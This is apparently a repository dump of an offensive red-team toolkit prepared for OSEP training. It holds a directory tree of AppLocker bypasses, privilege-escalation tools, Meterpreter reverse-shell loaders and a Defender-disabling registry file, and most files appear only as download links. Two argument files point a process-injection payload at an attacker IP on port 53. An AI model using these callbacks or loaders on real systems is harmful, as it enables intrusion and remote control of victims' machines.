├── Active_Directory ├── sql │ ├── .vs │ │ └── sql │ │ │ └── v16 │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide-wal │ │ │ └── storage.ide │ ├── bin │ │ ├── Debug │ │ │ ├── sql.exe │ │ │ ├── sql.pdb │ │ │ └── sql.exe.config │ │ └── x64 │ │ │ └── Release │ │ │ ├── sql.exe │ │ │ ├── sql.pdb │ │ │ └── sql.exe.config │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ └── sql.csproj └── README.md ├── Privilege_Escalation ├── PrintSpoofer.NET │ ├── .vs │ │ └── PrintSpoofer │ │ │ └── v16 │ │ │ ├── Server │ │ │ └── sqlite3 │ │ │ │ ├── db.lock │ │ │ │ ├── storage.ide-wal │ │ │ │ └── storage.ide │ │ │ └── .suo │ ├── bin │ │ └── x64 │ │ │ └── Release │ │ │ ├── PrintSpoofer.exe │ │ │ ├── PrintSpoofer.pdb │ │ │ └── PrintSpoofer.exe.config │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── PrintSpoofer.sln │ └── PrintSpoofer.csproj ├── SpoolSample.exe ├── shakeitoff │ ├── x64 │ │ └── Release │ │ │ ├── shakeitoff.vcxproj.FileListAbsolute.txt │ │ │ ├── main.obj │ │ │ ├── vc142.pdb │ │ │ ├── exploit.obj │ │ │ ├── FileOpLock.obj │ │ │ ├── shakeitoff.exe │ │ │ ├── shakeitoff.pdb │ │ │ ├── shakeitoff.iobj │ │ │ ├── shakeitoff.ipdb │ │ │ ├── shakeitoff.tlog │ │ │ ├── CL.read.1.tlog │ │ │ ├── CL.write.1.tlog │ │ │ ├── link.read.1.tlog │ │ │ ├── CL.command.1.tlog │ │ │ ├── link.write.1.tlog │ │ │ ├── link.command.1.tlog │ │ │ ├── shakeitoff.write.1u.tlog │ │ │ └── shakeitoff.lastbuildstate │ │ │ └── shakeitoff.exe.recipe │ ├── msi │ │ └── shakeitoff.msi │ ├── src │ │ ├── FileOpLock.h │ │ ├── exploit.h │ │ ├── winglue.h │ │ ├── FileOpLock.cpp │ │ └── main.cpp │ ├── shakeitoff.sln │ ├── LICENSE │ ├── shakeitoff.vcxproj.filters │ └── README.md ├── UACBypass.ps1 └── README.md ├── AppLocker_Bypass ├── DLLInject64 │ ├── RunProcess_Args.txt │ ├── payload_dir │ │ ├── RunProcess_Args.txt │ │ ├── NDesk.Options.dll │ │ ├── DotNetToJScript.exe │ │ ├── DLLInject64_DN2JS.dll │ │ └── DotNetToJScript-master.zip │ ├── Properties │ │ └── AssemblyInfo.cs │ └── DLLInject64_DN2JS.csproj ├── DLLRunner32 │ ├── Shellcode-Encryption │ │ ├── requirements.txt │ │ └── readme.md │ ├── payload_dir │ │ ├── NDesk.Options.dll │ │ ├── DotNetToJScript.exe │ │ ├── DLLRunner32_DN2JS.dll │ │ └── DotNetToJScript-master.zip │ ├── Properties │ │ └── AssemblyInfo.cs │ └── DLLRunner32_DN2JS.csproj ├── psBypass │ ├── psbypass │ │ ├── obj │ │ │ ├── x64 │ │ │ │ └── Release │ │ │ │ │ ├── examine.csproj.AssemblyReference.cache │ │ │ │ │ └── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ └── Release │ │ │ │ ├── examine.csproj.AssemblyReference.cache │ │ │ │ └── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── bin │ │ │ └── x64 │ │ │ │ └── Release │ │ │ │ ├── psbypass.exe │ │ │ │ ├── psbypass.pdb │ │ │ │ ├── System.Management.Automation.dll │ │ │ │ ├── Microsoft.PowerShell.ConsoleHost.dll │ │ │ │ └── psbypass.exe.config │ │ └── App.config │ ├── bin │ │ └── x64 │ │ │ └── Release │ │ │ ├── psbypass.exe │ │ │ ├── psbypass.pdb │ │ │ ├── System.Management.Automation.dll │ │ │ ├── Microsoft.PowerShell.ConsoleHost.dll │ │ │ └── psbypass.exe.config │ ├── App.config │ ├── psbypass.cs │ └── psbypass.csproj └── altBypass │ ├── bin │ ├── Release │ │ ├── altbypass.exe │ │ ├── altbypass.pdb │ │ ├── System.Management.Automation.dll │ │ └── altbypass.exe.config │ └── x64 │ │ └── Release │ │ ├── altbypass.exe │ │ ├── altbypass.pdb │ │ ├── System.Management.Automation.dll │ │ └── altbypass.exe.config │ ├── obj │ └── Release │ │ └── altbypass.csproj.AssemblyReference.cache │ └── App.config ├── payloads ├── Misc │ ├── MiniDump.exe │ ├── psLessExec.exe │ ├── Fileless Lateral Movement.exe │ ├── Create-Admin.ps1 │ └── Get-AppLockerRules.ps1 ├── Active_Directory │ └── sql.exe ├── Loaders_Disk │ ├── clhollow.exe │ ├── clinject.exe │ ├── clrunner.exe │ ├── x64_met_staged_reversetcp_hollow.exe │ ├── x64_met_staged_reversetcp_inject.exe │ ├── x64_met_staged_reversehttps_hollow.exe │ └── x64_met_staged_reversehttps_inject.exe ├── AppLocker_Bypass │ ├── psbypass.exe │ ├── altbypass.exe │ ├── altbypass_no_AMSI.exe │ └── nonDN2J.hta ├── Privilege_Escalation │ ├── PrintSpoofer.exe │ ├── SpoolSample.exe │ ├── shakeitoff.exe │ └── UACBypass.ps1 └── Macros │ └── WordPsCradle.vbs ├── Other ├── ad_cs_imgs │ ├── bloodhound.png │ ├── title-ad.png │ ├── Example_SPN01.png │ ├── Example_trust01.PNG │ ├── Example_trust02.PNG │ ├── Example_Defender01.PNG │ ├── Example_Child_to_parent01.PNG │ ├── Example_execution-policy.PNG │ └── Example_BloodHound_GenericAll.PNG ├── disable_realtime_protection.reg └── enable_realtime_protection.reg ├── Loaders_Disk ├── D_invoke │ ├── Builder.exe │ ├── dll │ │ ├── dll.dll │ │ ├── Template.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ └── dll.csproj │ ├── exe │ │ ├── exe.exe │ │ ├── App.config │ │ ├── Template.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ └── exe.csproj │ ├── Builder │ │ ├── Builder.exe │ │ ├── App.config │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ └── Builder.csproj │ ├── service │ │ ├── service.exe │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Template.cs │ │ ├── Service1.Designer.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ └── service.csproj │ ├── test │ │ ├── App.config │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ └── test.csproj │ └── D_invoke.sln ├── bins │ ├── x64_met_staged_reversehttps_hollow.exe │ ├── x64_met_staged_reversehttps_inject.exe │ ├── x64_met_staged_reversetcp_hollow.exe │ ├── x64_met_staged_reversetcp_inject.exe │ └── README.md ├── clhollow │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ └── clhollow.csproj ├── clinject │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ └── clinject.csproj ├── clrunner │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ └── clrunner.csproj └── formatters │ ├── formatshellcode.py │ ├── README.md │ ├── portip_eggs.py │ └── bin_to_vbappArray.py ├── Misc ├── MiniDump │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── MiniDump.sln │ ├── MiniDump.cs │ ├── MiniDump.ps1 │ └── MiniDump.csproj ├── PSLessExec │ ├── App.config │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── Fileless Lateral Movement.sln │ └── PSLessExec.csproj ├── Autos │ ├── PS-Cheatsheet.ps1 │ └── Create-Admin.ps1 ├── AV_Stuff │ └── Get-AppLockerRules.ps1 └── README.md ├── Linux ├── Linux_Shellcode_Loaders │ ├── simpleLoader.c │ ├── simpleXORencoder.c │ ├── sharedLibrary_LD_LIBRARY_PATH.c │ └── sharedLibrary_LD_PRELOAD.c └── README.md ├── Macros ├── WordPsCradle.vbs ├── vbObfuscate.ps1 └── README.md └── Loaders_Memory └── README.md /Active_Directory/sql/.vs/sql/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/RunProcess_Args.txt: -------------------------------------------------------------------------------- 1 | o.RunProcess("192.168.45.241", "53", "svchost"); -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/Shellcode-Encryption/requirements.txt: -------------------------------------------------------------------------------- 1 | pycryptodome 2 | pyscrypt 3 | -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/examine.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/payload_dir/RunProcess_Args.txt: -------------------------------------------------------------------------------- 1 | o.RunProcess("192.168.45.241", "53", "explorer"); -------------------------------------------------------------------------------- /payloads/Misc/MiniDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/MiniDump.exe -------------------------------------------------------------------------------- /payloads/Misc/psLessExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/psLessExec.exe -------------------------------------------------------------------------------- /Other/ad_cs_imgs/bloodhound.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/bloodhound.png -------------------------------------------------------------------------------- /Other/ad_cs_imgs/title-ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/title-ad.png -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/Builder.exe -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/dll/dll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/dll/dll.dll -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/exe.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/exe/exe.exe -------------------------------------------------------------------------------- /payloads/Active_Directory/sql.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Active_Directory/sql.exe -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_SPN01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_SPN01.png -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_trust01.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_trust01.PNG -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_trust02.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_trust02.PNG -------------------------------------------------------------------------------- /Privilege_Escalation/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/SpoolSample.exe -------------------------------------------------------------------------------- /payloads/Loaders_Disk/clhollow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clhollow.exe -------------------------------------------------------------------------------- /payloads/Loaders_Disk/clinject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clinject.exe -------------------------------------------------------------------------------- /payloads/Loaders_Disk/clrunner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clrunner.exe -------------------------------------------------------------------------------- /Active_Directory/sql/bin/Debug/sql.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/Debug/sql.exe -------------------------------------------------------------------------------- /Active_Directory/sql/bin/Debug/sql.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/Debug/sql.pdb -------------------------------------------------------------------------------- /payloads/AppLocker_Bypass/psbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/psbypass.exe -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder/Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/Builder/Builder.exe -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/service.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/service/service.exe -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_Defender01.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_Defender01.PNG -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\User\shakeitoff\x64\Release\shakeitoff.exe 2 | -------------------------------------------------------------------------------- /payloads/AppLocker_Bypass/altbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/altbypass.exe -------------------------------------------------------------------------------- /payloads/Misc/Fileless Lateral Movement.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/Fileless Lateral Movement.exe -------------------------------------------------------------------------------- /Active_Directory/sql/bin/x64/Release/sql.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/x64/Release/sql.exe -------------------------------------------------------------------------------- /Active_Directory/sql/bin/x64/Release/sql.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/x64/Release/sql.pdb -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_Child_to_parent01.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_Child_to_parent01.PNG -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_execution-policy.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_execution-policy.PNG -------------------------------------------------------------------------------- /payloads/Privilege_Escalation/PrintSpoofer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/PrintSpoofer.exe -------------------------------------------------------------------------------- /payloads/Privilege_Escalation/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/SpoolSample.exe -------------------------------------------------------------------------------- /payloads/Privilege_Escalation/shakeitoff.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/shakeitoff.exe -------------------------------------------------------------------------------- /payloads/AppLocker_Bypass/altbypass_no_AMSI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/altbypass_no_AMSI.exe -------------------------------------------------------------------------------- /Other/ad_cs_imgs/Example_BloodHound_GenericAll.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_BloodHound_GenericAll.PNG -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/msi/shakeitoff.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/msi/shakeitoff.msi -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/Release/altbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/altbypass.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/Release/altbypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/altbypass.pdb -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/main.obj -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.pdb -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.pdb -------------------------------------------------------------------------------- /Loaders_Disk/bins/x64_met_staged_reversehttps_hollow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversehttps_hollow.exe -------------------------------------------------------------------------------- /Loaders_Disk/bins/x64_met_staged_reversehttps_inject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversehttps_inject.exe -------------------------------------------------------------------------------- /Loaders_Disk/bins/x64_met_staged_reversetcp_hollow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversetcp_hollow.exe -------------------------------------------------------------------------------- /Loaders_Disk/bins/x64_met_staged_reversetcp_inject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversetcp_inject.exe -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/exploit.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/exploit.obj -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/payload_dir/NDesk.Options.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/NDesk.Options.dll -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/payload_dir/NDesk.Options.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/NDesk.Options.dll -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/FileOpLock.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/FileOpLock.obj -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.pdb -------------------------------------------------------------------------------- /payloads/Loaders_Disk/x64_met_staged_reversetcp_hollow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversetcp_hollow.exe -------------------------------------------------------------------------------- /payloads/Loaders_Disk/x64_met_staged_reversetcp_inject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversetcp_inject.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript.exe -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.iobj -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.ipdb -------------------------------------------------------------------------------- /payloads/Loaders_Disk/x64_met_staged_reversehttps_hollow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversehttps_hollow.exe -------------------------------------------------------------------------------- /payloads/Loaders_Disk/x64_met_staged_reversehttps_inject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversehttps_inject.exe -------------------------------------------------------------------------------- /Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/payload_dir/DLLInject64_DN2JS.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DLLInject64_DN2JS.dll -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/payload_dir/DLLRunner32_DN2JS.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DLLRunner32_DN2JS.dll -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.pdb -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/.suo -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript-master.zip -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript-master.zip -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/Release/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/System.Management.Automation.dll -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe -------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.pdb -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/bin/x64/Release/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/System.Management.Automation.dll -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/System.Management.Automation.dll -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /AppLocker_Bypass/psBypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/Microsoft.PowerShell.ConsoleHost.dll -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /AppLocker_Bypass/altBypass/obj/Release/altbypass.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/obj/Release/altbypass.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- 